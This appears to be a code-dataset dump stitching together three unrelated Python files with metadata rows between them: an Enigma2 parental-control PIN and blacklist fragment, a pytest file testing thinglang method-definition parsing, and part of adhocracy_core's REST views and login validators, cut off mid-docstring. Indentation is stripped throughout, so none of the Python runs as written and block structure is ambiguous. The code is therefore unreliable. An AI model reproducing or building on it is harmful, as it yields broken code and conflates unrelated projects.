self.checkPinInterval = False
self.checkPinIntervalCancel = False
self.checkSessionPin = False
self.sessionPinCached = False
self.pinIntervalSeconds = 0
self.pinIntervalSecondsCancel = 0
self.storeServicePin = config.ParentalControl.storeservicepin.value
if self.storeServicePin == "never":
pass
elif self.storeServicePin == "standby":
self.checkSessionPin = True
else:
self.checkPinInterval = True
iMinutes = float(self.storeServicePin)
iSeconds = int(iMinutes * 60)
self.pinIntervalSeconds = iSeconds
def standbyCounterCallback(self, configElement):
self.resetSessionPin()
def resetSessionPin(self):
#Reset the session pin, stop the timer
self.sessionPinCached = False
self.hideBlacklist()
def getCurrentTimeStamp(self):
return time.time()
def getPinList(self):
return [x.value for x in config.ParentalControl.servicepin]
def setSessionPinCached(self):
if self.checkSessionPin == True:
self.sessionPinCached = True
if self.checkPinInterval == True:
self.sessionPinCached = True
self.sessionPinTimer.startLongTimer(self.pinIntervalSeconds)
def servicePinEntered(self, service, result=None):
if result:
self.setSessionPinCached()
self.hideBlacklist()
self.callback(ref=service)
elif result == False:
messageText = _("The pin code you entered is wrong.")
if self.session:
self.session.open(MessageBox, messageText, MessageBox.TYPE_INFO, timeout=3)
else:
AddPopup(messageText, MessageBox.TYPE_ERROR, timeout=3)
def saveListToFile(self, sWhichList, vList):
#Replaces saveWhiteList and saveBlackList:
#I don't like to have two functions with identical code...
file = open(resolveFilename(SCOPE_CONFIG, sWhichList), 'w')
for sService, sType in vList.iteritems():
#Only Services that are selected directly and Bouqets are saved.
#Services that are added by a bouquet are not saved.
#This is the reason for the change in self.whitelist and self.blacklist
if TYPE_SERVICE in sType or TYPE_BOUQUET in sType:
file.write(str(sService) + "\n")
file.close()
def openListFromFile(self, sWhichList):
#Replaces openWhiteList and openBlackList:
#I don't like to have two functions with identical code...
result = {}
try:
file = open(resolveFilename(SCOPE_CONFIG, sWhichList), 'r')
for x in file:
sPlain = x.strip()
self.serviceMethodWrapper(sPlain, self.addServiceToList, result)
file.close()
except:
pass
return result
def addServiceToList(self, service, type, vList):
#Replaces addWhitelistService and addBlacklistService
#The lists are not only lists of service references any more.
#They are named lists with the service as key and an array of types as value:
if service in vList:
if not type in vList[service]:
vList[service].append(type)
else:
vList[service] = [type]
def removeServiceFromList(self, service, type, vList):
#Replaces deleteWhitelistService and deleteBlacklistService
if service in vList:
if type in vList[service]:
vList[service].remove(type)
if not vList[service]:
del vList[service]
def readServicesFromBouquet(self, sBouquetSelection, formatstring):
#This method gives back a list of services for a given bouquet
from enigma import eServiceCenter, eServiceReference
serviceHandler = eServiceCenter.getInstance()
refstr = sBouquetSelection
root = eServiceReference(refstr)
list = serviceHandler.list(root)
if list is not None:
services = list.getContent("CN", True) #(servicecomparestring, name)
return services
def save(self):
self.saveListToFile(LIST_BLACKLIST, self.blacklist)
def open(self):
self.blacklist = self.openListFromFile(LIST_BLACKLIST)
self.hideBlacklist()
if not self.filesOpened:
# Reset PIN cache on standby: Use StandbyCounter- Config- Callback
config.misc.standbyCounter.addNotifier(self.standbyCounterCallback, initial_call=False)
self.filesOpened = True
def __getattr__(self, name):
# This method is called if we lack a property. I'm lazy, so
# I load the files when someone 'hits' this code
if name in ('blacklist', 'whitelist'):
if not self.filesOpened:
self.open()
return getattr(self, name)
raise AttributeError, name
def hideBlacklist(self):
if self.blacklist:
if config.ParentalControl.servicepinactive.value and config.ParentalControl.storeservicepin.value != "never" and config.ParentalControl.hideBlacklist.value and not self.sessionPinCached:
for ref in self.blacklist:
if TYPE_BOUQUET not in ref:
eDVBDB.getInstance().addFlag(eServiceReference(ref), 2)
else:
for ref in self.blacklist:
if TYPE_BOUQUET not in ref:
eDVBDB.getInstance().removeFlag(eServiceReference(ref), 2)
refreshServiceList()
| gpl-2.0 | 7,032,258,057,532,749,000 | 41.746479 | 287 | 0.765651 | false |
ytanay/thinglang | tests/parser/test_method_definition_parsing.py | 1 | 2798 | import pytest
from tests.infrastructure.test_utils import parse_local
from thinglang.lexer.values.identifier import Identifier
from thinglang.parser.definitions.method_definition import MethodDefinition
from thinglang.parser.errors import VectorReductionError
def validate_method_definition(node, name, expected_arguments=(), return_type=None):
assert isinstance(node, MethodDefinition)
assert node.name == (name if isinstance(name, Identifier) else Identifier(name))
assert node.return_type == return_type
for actual_argument, expected_argument in zip(node.arguments, expected_arguments):
assert actual_argument.value == expected_argument[0]
assert actual_argument.type.value == expected_argument[1]
def test_simple_method_definition():
method = parse_local("does say_hello")
validate_method_definition(method, 'say_hello')
def test_simple_constructor_definition():
method = parse_local("setup")
parse_local("thing container").attach(method)
validate_method_definition(method, Identifier.constructor(), return_type=Identifier('container'))
def test_constructor_arguments():
method = parse_local("setup with text name, number age")
parse_local("thing container").attach(method)
validate_method_definition(method, Identifier.constructor(), [('name', 'text'), ('age', 'number')], Identifier('container'))
def test_method_definition_return_type():
method = parse_local("does compute returns number")
validate_method_definition(method, 'compute', (), Identifier('number'))
def test_single_argument_method_definition():
method = parse_local("does say_hello with text message")
validate_method_definition(method, 'say_hello', [('message', 'text')])
def test_multiple_argument_method_definition():
method = parse_local("does say_hello with text message, number count")
validate_method_definition(method, 'say_hello', [('message', 'text'), ('count', 'number')])
def test_combined_method_definition():
method = parse_local("does say_hello with text message, number count returns text")
validate_method_definition(method, 'say_hello', [('message', 'text'), ('count', 'number')], Identifier('text'))
INVALID_SYNTAX_EXAMPLES = [
"does say_hello with text",
"does say_hello with text name, number",
"does say_hello with text name age",
"does say_hello with text number , , age",
"does say_hello with number, age",
"does say_hello with number 2",
"does say_hello returns number returns text",
"does say_hello returns number with number a",
"setup returns number"
]
@pytest.mark.parametrize('source', INVALID_SYNTAX_EXAMPLES)
def test_method_definition_argument_invalid_syntax(source):
with pytest.raises(VectorReductionError):
parse_local(source)
| mit | -3,130,915,743,327,870,000 | 38.408451 | 128 | 0.725518 | false |
fhartwig/adhocracy3.mercator | src/adhocracy_core/adhocracy_core/rest/views.py | 1 | 46505 | """GET/POST/PUT requests processing."""
from collections import defaultdict
from copy import deepcopy
from logging import getLogger
from colander import Invalid
from colander import MappingSchema
from colander import SchemaNode
from colander import SequenceSchema
from substanced.interfaces import IUserLocator
from substanced.util import find_service
from pyramid.httpexceptions import HTTPMethodNotAllowed
from pyramid.httpexceptions import HTTPGone
from pyramid.httpexceptions import HTTPBadRequest
from pyramid.request import Request
from pyramid.view import view_config
from pyramid.view import view_defaults
from pyramid.security import remember
from pyramid.traversal import resource_path
from zope.interface.interfaces import IInterface
from zope.interface import Interface
from adhocracy_core.caching import set_cache_header
from adhocracy_core.events import ResourceSheetModified
from adhocracy_core.interfaces import IResource
from adhocracy_core.interfaces import IItem
from adhocracy_core.interfaces import IItemVersion
from adhocracy_core.interfaces import ISimple
from adhocracy_core.interfaces import ISheet
from adhocracy_core.interfaces import IPool
from adhocracy_core.interfaces import ILocation
from adhocracy_core.resources.asset import IAsset
from adhocracy_core.resources.asset import IAssetDownload
from adhocracy_core.resources.asset import IAssetsService
from adhocracy_core.resources.asset import validate_and_complete_asset
from adhocracy_core.resources.principal import IUsersService
from adhocracy_core.resources.principal import IPasswordReset
from adhocracy_core.resources.badge import IBadgeAssignmentsService
from adhocracy_core.rest.schemas import ResourceResponseSchema
from adhocracy_core.rest.schemas import ItemResponseSchema
from adhocracy_core.rest.schemas import POSTActivateAccountViewRequestSchema
from adhocracy_core.rest.schemas import POSTItemRequestSchema
from adhocracy_core.rest.schemas import POSTLoginEmailRequestSchema
from adhocracy_core.rest.schemas import POSTLoginUsernameRequestSchema
from adhocracy_core.rest.schemas import POSTMessageUserViewRequestSchema
from adhocracy_core.rest.schemas import POSTCreatePasswordResetRequestSchema
from adhocracy_core.rest.schemas import POSTPasswordResetRequestSchema
from adhocracy_core.rest.schemas import POSTReportAbuseViewRequestSchema
from adhocracy_core.rest.schemas import POSTResourceRequestSchema
from adhocracy_core.rest.schemas import PUTResourceRequestSchema
from adhocracy_core.rest.schemas import GETPoolRequestSchema
from adhocracy_core.rest.schemas import GETItemResponseSchema
from adhocracy_core.rest.schemas import GETResourceResponseSchema
from adhocracy_core.rest.schemas import options_resource_response_data_dict
from adhocracy_core.rest.schemas import add_arbitrary_filter_nodes
from adhocracy_core.rest.exceptions import error_entry
from adhocracy_core.schema import AbsolutePath
from adhocracy_core.schema import References
from adhocracy_core.sheets.asset import retrieve_asset_file
from adhocracy_core.sheets.badge import get_assignable_badges
from adhocracy_core.sheets.badge import IBadgeAssignment
from adhocracy_core.sheets.metadata import IMetadata
from adhocracy_core.sheets.metadata import is_older_than
from adhocracy_core.sheets.workflow import IWorkflowAssignment
from adhocracy_core.sheets.principal import IPasswordAuthentication
from adhocracy_core.sheets.pool import IPool as IPoolSheet
from adhocracy_core.sheets.principal import IUserBasic
from adhocracy_core.utils import extract_events_from_changelog_metadata
from adhocracy_core.utils import get_sheet
from adhocracy_core.utils import get_user
from adhocracy_core.utils import is_batchmode
from adhocracy_core.utils import strip_optional_prefix
from adhocracy_core.utils import to_dotted_name
from adhocracy_core.utils import unflatten_multipart_request
from adhocracy_core.resources.root import IRootPool
from adhocracy_core.workflows.schemas import create_workflow_meta_schema
logger = getLogger(__name__)
def respond_if_blocked(context, request):
"""
Set 410 Gone and construct response if resource is deleted or hidden.
Otherwise or it request method is 'options' or 'put' return None
"""
from adhocracy_core.utils import get_reason_if_blocked
if request.method not in ['HEAD', 'GET', 'POST']:
return
block_reason = get_reason_if_blocked(context)
if block_reason is not None:
raise HTTPGone(detail=block_reason)
def validate_post_root_versions(context, request: Request):
"""Check and transform the 'root_version' paths to resources."""
# TODO: make this a colander validator and move to schema.py
# use the catalog to find IItemversions
root_versions = request.validated.get('root_versions', [])
valid_root_versions = []
for root in root_versions:
if not IItemVersion.providedBy(root):
error = 'This resource is not a valid ' \
'root version: {}'.format(request.resource_url(root))
request.errors.append(error_entry('body', 'root_versions', error))
continue
valid_root_versions.append(root)
request.validated['root_versions'] = valid_root_versions
def validate_request_data(context: ILocation, request: Request,
schema=MappingSchema(), extra_validators=[]):
""" Validate request data.
:param context: passed to validator functions
:param request: passed to validator functions
:param schema: Schema to validate. Data to validate is extracted from the
request.body. For schema nodes with attribute `location` ==
`querystring` the data is extracted from the query string.
The validated data (dict or list) is stored in the
`request.validated` attribute.
The `None` value is allowed to disable schema validation.
:param extra_validators: Functions called after schema validation.
The passed arguments are `context` and `request`.
The should append errors to `request.errors` and
validated data to `request.validated`.
:raises HTTPBadRequest: HTTP 400 for bad request data.
"""
parent = context if request.method == 'POST' else context.__parent__
workflow = _get_workflow(context, request)
schema_with_binding = schema.bind(context=context,
request=request,
registry=request.registry,
workflow=workflow,
parent_pool=parent)
body = {}
if request.content_type == 'multipart/form-data':
body = unflatten_multipart_request(request)
if request.content_type == 'application/json':
body = _extract_json_body(request)
validate_user_headers(request)
qs = _extract_querystring(request)
validate_body_or_querystring(body, qs, schema_with_binding, context,
request)
_validate_extra_validators(extra_validators, context, request)
if request.errors:
request.validated = {}
raise HTTPBadRequest()
def _get_workflow(context: IResource, request: Request):
if request.method == 'POST':
return
get_workflow = request.registry.content.get_workflow
workflow = get_workflow(context)
return workflow
def _extract_json_body(request: Request) -> object:
json_body = {}
if request.body == '':
request.body = '{}'
try:
json_body = request.json_body
except (ValueError, TypeError) as err:
error = error_entry('body', None,
'Invalid JSON request body'.format(err))
request.errors.append(error)
return json_body
def _extract_querystring(request: Request) -> dict:
parameters = {}
for key, value_encoded in request.GET.items():
import json
try:
value = json.loads(value_encoded)
except (ValueError, TypeError):
value = value_encoded
parameters[key] = value
return parameters
def validate_user_headers(request: Request):
"""
Validate the user headers.
If the request has a 'X-User-Path' and/or 'X-User-Token' header, we
ensure that the session takes belongs to the user and is not expired.
"""
headers = request.headers
if 'X-User-Path' in headers or 'X-User-Token' in headers:
if get_user(request) is None:
error = error_entry('header', 'X-User-Token', 'Invalid user token')
request.errors.append(error)
def validate_body_or_querystring(body, qs: dict, schema: MappingSchema,
context: IResource, request: Request):
"""Validate the querystring if this is a GET request, the body otherwise.
This allows using just a single schema for all kinds of requests.
"""
if isinstance(schema, GETPoolRequestSchema):
try:
schema = add_arbitrary_filter_nodes(qs,
schema,
context,
request.registry)
except Invalid as err: # pragma: no cover
_add_colander_invalid_error_to_request(err, request,
location='querystring')
if request.method.upper() == 'GET':
_validate_schema(qs, schema, request,
location='querystring')
else:
_validate_schema(body, schema, request, location='body')
def _validate_schema(cstruct: object, schema: MappingSchema, request: Request,
location='body'):
"""Validate that the :term:`cstruct` data is conform to the given schema.
:param request: request with list like `errors` attribute to append errors
and the dictionary attribute `validated` to add validated
data.
:param location: filter schema nodes depending on the `location` attribute.
The default value is `body`.
"""
if isinstance(schema, SequenceSchema):
_validate_list_schema(schema, cstruct, request, location)
elif isinstance(schema, MappingSchema):
_validate_dict_schema(schema, cstruct, request, location)
else:
error = 'Validation for schema {} is unsupported.'.format(str(schema))
raise(Exception(error))
def _validate_list_schema(schema: SequenceSchema, cstruct: list,
request: Request, location='body'):
if location != 'body': # for now we only support location == body
return
child_cstructs = schema.cstruct_children(cstruct)
try:
request.validated = schema.deserialize(child_cstructs)
except Invalid as err:
_add_colander_invalid_error_to_request(err, request, location)
def _validate_dict_schema(schema: MappingSchema, cstruct: dict,
request: Request, location='body'):
validated = {}
try:
validated = schema.deserialize(cstruct)
except Invalid as err:
for child in err.children:
_add_colander_invalid_error_to_request(child, request, location)
if not err.children:
_add_colander_invalid_error_to_request(err, request, location)
request.validated.update(validated)
def _add_colander_invalid_error_to_request(error: Invalid, request: Request,
location: str):
for name, msg in error.asdict().items():
request.errors.append(error_entry(location, name, msg))
def _validate_extra_validators(validators: list, context, request: Request):
"""Run `validators` functions. Assuming schema validation run before."""
if request.errors:
return
for val in validators:
val(context, request)
class RESTView:
"""Class stub with request data validation support.
Subclasses must implement the wanted request methods
and configure the pyramid view::
@view_defaults(
renderer='json',
context=IResource,
)
class MySubClass(RESTView):
validation_GET = (MyColanderSchema, [my_extra_validation_function])
@view_config(request_method='GET')
def get(self):
...
"""
validation_OPTIONS = (None, [])
validation_HEAD = (None, [])
validation_GET = (None, [])
validation_PUT = (None, [])
validation_POST = (None, [])
def __init__(self, context, request):
"""Initialize self."""
self.context = context
"""Context Resource."""
self.request = request
""":class:`pyramid.request.Request`."""
respond_if_blocked(context, request)
set_cache_header(context, request)
schema_class, validators = _get_schema_and_validators(self, request)
validate_request_data(context, request,
schema=schema_class(),
extra_validators=validators)
def options(self) -> dict:
"""Return options for view.
Note: This default implementation currently only exist in order to
satisfy the preflight request, which browsers do in CORS situations
before doing an actual POST request. Subclasses still have to
configure the view and delegate to this implementation explicitly if
they want to use it.
"""
return {}
def get(self) -> dict:
"""HTTP GET."""
raise HTTPMethodNotAllowed()
def put(self) -> dict:
""""HTTP PUT."""
raise HTTPMethodNotAllowed()
def post(self) -> dict:
"""HTTP POST."""
raise HTTPMethodNotAllowed()
def delete(self) -> dict:
"""HTTP delete."""
raise HTTPMethodNotAllowed()
def _build_updated_resources_dict(self) -> dict:
"""Utility method used by several subclasses."""
result = defaultdict(list)
changelog_meta = self.request.registry.changelog.values()
for meta in changelog_meta:
events = extract_events_from_changelog_metadata(meta)
for event in events:
result[event].append(meta.resource)
return result
def _get_schema_and_validators(view_class, request: Request) -> tuple:
http_method = request.method.upper()
validation_attr = 'validation_' + http_method
schema, validators = getattr(view_class, validation_attr, (None, []))
return schema or MappingSchema, validators
@view_defaults(
renderer='json',
context=IResource,
)
class ResourceRESTView(RESTView):
"""Default view for Resources, implements get and options."""
def __init__(self, context, request):
"""Initialize self."""
super().__init__(context, request)
self.registry = request.registry.content
""":class:`pyramid.registry.Registry`."""
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Get possible request/response data structures and http methods."""
context = self.context
request = self.request
registry = self.registry
empty = {} # tiny performance tweak
cstruct = deepcopy(options_resource_response_data_dict)
if request.has_permission('edit_some', context):
edits = self.registry.get_sheets_edit(context, request)
put_sheets = [(s.meta.isheet.__identifier__, empty) for s in edits]
if put_sheets:
put_sheets_dict = dict(put_sheets)
self._add_metadata_edit_permission_info(put_sheets_dict)
self._add_workflow_edit_permission_info(put_sheets_dict, edits)
cstruct['PUT']['request_body']['data'] = put_sheets_dict
else:
del cstruct['PUT']
else:
del cstruct['PUT']
if request.has_permission('view', context):
views = self.registry.get_sheets_read(context, request)
get_sheets = [(s.meta.isheet.__identifier__, empty) for s in views]
if get_sheets:
cstruct['GET']['response_body']['data'] = dict(get_sheets)
else:
del cstruct['GET']
else:
del cstruct['GET']
is_users = IUsersService.providedBy(context) \
and request.has_permission('create_user', self.context)
# TODO move the is_user specific part the UsersRestView
if request.has_permission('create', self.context) or is_users:
addables = registry.get_resources_meta_addable(context, request)
if addables:
for resource_meta in addables:
iresource = resource_meta.iresource
resource_typ = iresource.__identifier__
creates = registry.get_sheets_create(context, request,
iresource)
sheet_typs = [s.meta.isheet.__identifier__ for s in
creates]
sheets_dict = dict.fromkeys(sheet_typs, empty)
post_data = {'content_type': resource_typ,
'data': sheets_dict}
cstruct['POST']['request_body'].append(post_data)
else:
del cstruct['POST']
else:
del cstruct['POST']
return cstruct
def _add_metadata_edit_permission_info(self, cstruct: dict):
"""Add info if a user may set the deleted/hidden metadata fields."""
if IMetadata.__identifier__ not in cstruct:
return
# everybody who can PUT metadata can delete the resource
permission_info = {'deleted': [True, False]}
if self.request.has_permission('hide', self.context):
permission_info['hidden'] = [True, False]
cstruct[IMetadata.__identifier__] = permission_info
def _add_workflow_edit_permission_info(self, cstruct: dict, edit_sheets):
"""Add info if a user may set the workflow_state workflow field."""
workflow_sheets = [s for s in edit_sheets
if s.meta.isheet.isOrExtends(IWorkflowAssignment)]
for sheet in workflow_sheets:
workflow = sheet.get()['workflow']
if workflow is None:
states = []
else:
states = workflow.get_next_states(self.context, self.request)
isheet = sheet.meta.isheet
cstruct[isheet.__identifier__] = {'workflow_state': states}
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get resource data (unless deleted or hidden)."""
schema = GETResourceResponseSchema().bind(request=self.request,
context=self.context)
cstruct = schema.serialize()
cstruct['data'] = self._get_sheets_data_cstruct()
return cstruct
def _get_sheets_data_cstruct(self):
queryparams = self.request.validated if self.request.validated else {}
sheets_view = self.registry.get_sheets_read(self.context,
self.request)
data_cstruct = {}
for sheet in sheets_view:
key = sheet.meta.isheet.__identifier__
if sheet.meta.isheet is IPoolSheet:
cstruct = sheet.get_cstruct(self.request, params=queryparams)
else:
cstruct = sheet.get_cstruct(self.request)
data_cstruct[key] = cstruct
return data_cstruct
@view_defaults(
renderer='json',
context=ISimple,
)
class SimpleRESTView(ResourceRESTView):
"""View for simples (non versionable), implements get, options and put."""
validation_PUT = (PUTResourceRequestSchema, [])
@view_config(request_method='PUT',
permission='edit_some',
accept='application/json')
def put(self) -> dict:
"""Edit resource and get response data."""
sheets = self.registry.get_sheets_edit(self.context, self.request)
appstructs = self.request.validated.get('data', {})
for sheet in sheets:
name = sheet.meta.isheet.__identifier__
if name in appstructs:
sheet.set(appstructs[name],
request=self.request)
appstruct = {}
if not is_batchmode(self.request): # pragma: no branch
appstruct[
'updated_resources'] = self._build_updated_resources_dict()
schema = ResourceResponseSchema().bind(request=self.request,
context=self.context)
cstruct = schema.serialize(appstruct)
return cstruct
@view_defaults(
renderer='json',
context=IPool,
)
class PoolRESTView(SimpleRESTView):
"""View for Pools, implements get, options, put and post."""
validation_GET = (GETPoolRequestSchema, [])
validation_POST = (POSTResourceRequestSchema, [])
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get resource data."""
# This delegation method is necessary since otherwise validation_GET
# won't be found.
return super().get()
def build_post_response(self, resource) -> dict:
"""Build response data structure for a POST request. """
appstruct = {}
if IItem.providedBy(resource):
appstruct['first_version_path'] = self._get_first_version(resource)
schema = ItemResponseSchema().bind(request=self.request,
context=resource)
else:
schema = ResourceResponseSchema().bind(request=self.request,
context=resource)
if not is_batchmode(self.request):
appstruct[
'updated_resources'] = self._build_updated_resources_dict()
return schema.serialize(appstruct)
def _get_first_version(self, item: IItem) -> IItemVersion:
for child in item.values():
if IItemVersion.providedBy(child):
return child
@view_config(request_method='POST',
permission='create',
accept='application/json')
def post(self) -> dict:
"""Create new resource and get response data."""
iresource = self.request.validated['content_type']
resource_type = iresource.__identifier__
appstructs = self.request.validated.get('data', {})
creator = get_user(self.request)
resource = self.registry.create(resource_type,
self.context,
creator=creator,
appstructs=appstructs,
request=self.request,
)
return self.build_post_response(resource)
@view_config(request_method='PUT',
permission='edit_some',
accept='application/json')
def put(self) -> dict:
"""HTTP PUT."""
return super().put()
@view_defaults(
renderer='json',
context=IItem,
)
class ItemRESTView(PoolRESTView):
"""View for Items and ItemVersions, overwrites GET and POST handling."""
validation_POST = (POSTItemRequestSchema, [validate_post_root_versions])
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get resource data."""
schema = GETItemResponseSchema().bind(request=self.request,
context=self.context)
appstruct = {}
first_version = self._get_first_version(self.context)
if first_version is not None:
appstruct['first_version_path'] = first_version
cstruct = schema.serialize(appstruct)
cstruct['data'] = self._get_sheets_data_cstruct()
return cstruct
@view_config(request_method='POST',
permission='create',
accept='application/json')
def post(self):
"""Create new resource and get response data.
For :class:`adhocracy_core.interfaces.IItemVersion`:
If a `new version` is already created in this transaction we don't want
to create a new one. Instead we modify the existing one.
This is needed to make :class:`adhocray_core.rest.batchview.BatchView`
work.
"""
batchmode = is_batchmode(self.request)
validated = self.request.validated
iresource = validated['content_type']
resource_type = iresource.__identifier__
appstructs = validated.get('data', {})
creator = get_user(self.request)
root_versions = validated.get('root_versions', [])
last_new_version = validated.get('_last_new_version_in_transaction',
None)
if last_new_version is not None: # this only happens in batch request
sheets = self.registry.get_sheets_create(last_new_version,
self.request)
appstructs = self.request.validated.get('data', {})
for sheet in sheets:
name = sheet.meta.isheet.__identifier__
if name in appstructs: # pragma: no branch
sheet.set(appstructs[name],
request=self.request)
resource = last_new_version
else:
resource = self.registry.create(resource_type,
self.context,
appstructs=appstructs,
creator=creator,
root_versions=root_versions,
request=self.request,
is_batchmode=batchmode,
)
return self.build_post_response(resource)
@view_defaults(
renderer='json',
context=IBadgeAssignmentsService,
)
class BadgeAssignmentsRESTView(PoolRESTView):
"""REST view for the badge assignment."""
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""HTTP GET."""
return super().get()
@view_config(request_method='POST',
permission='create',
accept='application/json')
def post(self):
"""HTTP POST."""
return super().post()
@view_config(request_method='OPTIONS')
def options(self) -> dict:
"""Get possible request/response data structures and http methods."""
cstruct = super().options()
if 'POST' not in cstruct:
return cstruct
for info in cstruct['POST']['request_body']:
if IBadgeAssignment.__identifier__ not in info['data']:
continue
assignables = get_assignable_badges(self.context, self.request)
urls = [self.request.resource_url(x) for x in assignables]
info['data'][IBadgeAssignment.__identifier__] =\
{'badge': urls}
return cstruct
@view_defaults(
renderer='json',
context=IUsersService,
)
class UsersRESTView(PoolRESTView):
"""View the IUsersService pool overwrites POST handling."""
@view_config(request_method='POST',
permission='create_user',
accept='application/json')
def post(self):
"""HTTP POST."""
return super().post()
@view_defaults(
renderer='json',
context=IAssetsService,
)
class AssetsServiceRESTView(PoolRESTView):
"""View allowing multipart requests for asset upload."""
@view_config(request_method='POST',
permission='create_asset',
accept='multipart/form-data')
def post(self):
"""HTTP POST."""
return super().post()
@view_defaults(
renderer='json',
context=IAsset,
)
class AssetRESTView(SimpleRESTView):
"""View for assets, allows PUTting new versions via multipart."""
@view_config(request_method='PUT',
permission='create_asset',
accept='multipart/form-data')
def put(self) -> dict:
"""HTTP PUT."""
result = super().put()
validate_and_complete_asset(self.context, self.request.registry)
return result
@view_defaults(
renderer='json',
context=IAssetDownload,
)
class AssetDownloadRESTView(SimpleRESTView):
"""
View for downloading assets as binary blobs.
Allows GET, but no POST or PUT.
"""
@view_config(request_method='GET',
permission='view')
def get(self) -> dict:
"""Get asset data (unless deleted or hidden)."""
file = retrieve_asset_file(self.context, self.request.registry)
response = file.get_response(self.context, self.request.registry)
self.ensure_caching_headers(response)
return response
def ensure_caching_headers(self, response):
"""Ensure cache headers for custom `response` objects."""
response.cache_control = self.request.response.cache_control
response.etag = self.request.response.etag
response.last_modified = self.request.response.last_modified
def put(self) -> dict:
"""HTTP PUT."""
raise HTTPMethodNotAllowed()
def post(self) -> dict:
"""HTTP POST."""
raise HTTPMethodNotAllowed()
@view_defaults(
renderer='json',
context=IRootPool,
name='meta_api'
)
class MetaApiView(RESTView):
"""Access to metadata about the API specification of this installation.
Returns a JSON document describing the existing resources and sheets.
"""
def _describe_resources(self, resources_meta):
"""Build a description of the resources registered in the system.
Args:
resources_meta (dict): mapping from iresource interfaces to metadata
Returns:
resource_map (dict): a dict (suitable for JSON serialization) that
describes all the resources registered in the
system.
"""
resource_map = {}
for iresource, resource_meta in resources_meta.items():
prop_map = {}
# super types
prop_map['super_types'] = _get_base_ifaces(iresource,
root_iface=IResource)
# List of sheets
sheets = []
sheets.extend(resource_meta.basic_sheets)
sheets.extend(resource_meta.extended_sheets)
prop_map['sheets'] = [to_dotted_name(s) for s in sheets]
# Main element type if this is a pool or item
if resource_meta.item_type:
prop_map['item_type'] = to_dotted_name(resource_meta.item_type)
# Other addable element types
if resource_meta.element_types:
element_names = []
for typ in resource_meta.element_types:
element_names.append(to_dotted_name(typ))
prop_map['element_types'] = element_names
resource_map[to_dotted_name(iresource)] = prop_map
return resource_map
def _describe_sheets(self, sheet_metadata):
"""Build a description of the sheets used in the system.
Args:
sheet_metadata: mapping of sheet names to metadata about them, as
returned by the registry
Returns:
A dict (suitable for JSON serialization) that describes the sheets
and their fields
"""
sheet_map = {}
for isheet, sheet_meta in sheet_metadata.items():
# readable and create_mandatory flags are currently defined for
# the whole sheet, but we copy them as attributes into each field
# definition, since this might change in the future.
# (The _sheet_field_readable method already allows overwriting the
# readable flag on a field-by-field basis, but it's somewhat
# ad-hoc.)
fields = []
# Create field definitions
for node in sheet_meta.schema_class().children:
fieldname = node.name
valuetype = type(node)
valuetyp = type(node.typ)
typ = to_dotted_name(valuetyp)
containertype = None
targetsheet = None
readonly = getattr(node, 'readonly', False)
if issubclass(valuetype, References):
empty_appstruct = node.bind().default
containertype = empty_appstruct.__class__.__name__
typ = to_dotted_name(AbsolutePath)
elif isinstance(node, SequenceSchema):
containertype = 'list'
typ = to_dotted_name(type(node.children[0]))
elif valuetype is not SchemaNode:
# If the outer type is not a container and it's not
# just a generic SchemaNode, we use the outer type
# as "valuetype" since it provides most specific
# information (e.g. "adhocracy_core.schema.Identifier"
# instead of just "SingleLine")
typ = to_dotted_name(valuetype)
if hasattr(node, 'reftype'):
# set targetsheet
reftype = node.reftype
target_isheet = reftype.getTaggedValue('target_isheet')
source_isheet = reftype.getTaggedValue('source_isheet')
isheet_ = source_isheet if node.backref else target_isheet
targetsheet = to_dotted_name(isheet_)
typ_stripped = strip_optional_prefix(typ, 'colander.')
fielddesc = {
'name': fieldname,
'valuetype': typ_stripped,
'create_mandatory':
False if readonly else sheet_meta.create_mandatory,
'editable': False if readonly else sheet_meta.editable,
'creatable': False if readonly else sheet_meta.creatable,
'readable': sheet_meta.readable,
}
if containertype is not None:
fielddesc['containertype'] = containertype
if targetsheet is not None:
fielddesc['targetsheet'] = targetsheet
fields.append(fielddesc)
super_types = _get_base_ifaces(isheet, root_iface=ISheet)
sheet_map[to_dotted_name(isheet)] = {'fields': fields,
'super_types': super_types}
return sheet_map
def _describe_workflows(self, appstructs: dict) -> dict:
cstructs = {}
for name, appstruct in appstructs.items():
schema = create_workflow_meta_schema(appstruct)
cstructs[name] = schema.serialize(appstruct)
return cstructs
@view_config(request_method='GET')
def get(self) -> dict:
"""Get the API specification of this installation as JSON."""
# Collect info about all resources
resources_meta = self.request.registry.content.resources_meta
resource_map = self._describe_resources(resources_meta)
# Collect info about all sheets referenced by any of the resources
sheet_metadata = self.request.registry.content.sheets_meta
sheet_map = self._describe_sheets(sheet_metadata)
workflows_meta = self.request.registry.content.workflows_meta
workflows_map = self._describe_workflows(workflows_meta)
struct = {'resources': resource_map,
'sheets': sheet_map,
'workflows': workflows_map,
}
return struct
def _get_base_ifaces(iface: IInterface, root_iface=Interface) -> [str]:
bases = []
current_bases = iface.getBases()
while current_bases:
old_bases = deepcopy(current_bases)
current_bases = ()
for base in old_bases:
if base.extends(root_iface):
bases.append(base.__identifier__)
current_bases += base.getBases()
return bases
def _add_no_such_user_or_wrong_password_error(request: Request):
error = error_entry('body', 'password',
'User doesn\'t exist or password is wrong')
request.errors.append(error)
def validate_login_name(context, request: Request):
"""Validate the user name of a login request.
If valid and activated, the user object is added as 'user' to
`request.validated`.
"""
name = request.validated['name']
locator = request.registry.getMultiAdapter((context, request),
IUserLocator)
user = locator.get_user_by_login(name)
if user is None:
_add_no_such_user_or_wrong_password_error(request)
else:
request.validated['user'] = user
def validate_login_email(context, request: Request):
"""Validate the email address of a login request.
If valid, the user object is added as 'user' to
`request.validated`.
"""
email = request.validated['email']
locator = request.registry.getMultiAdapter((context, request),
IUserLocator)
normalized_email = email.lower()
user = locator.get_user_by_email(normalized_email)
if user is None:
_add_no_such_user_or_wrong_password_error(request)
else:
request.validated['user'] = user
def validate_login_password(context, request: Request):
"""Validate the password of a login request.
Requires the user object as `user` in `request.validated`.
"""
user = request.validated.get('user', None)
if user is None:
return
password_sheet = get_sheet(user, IPasswordAuthentication,
registry=request.registry)
password = request.validated['password']
try:
valid = password_sheet.check_plaintext_password(password)
except ValueError:
valid = False
if not valid:
_add_no_such_user_or_wrong_password_error(request)
def validate_account_active(context, request: Request):
"""Ensure that the user account is already active.
Requires the user object as `user` in `request.validated`.
No error message is added if there were earlier errors, as that would
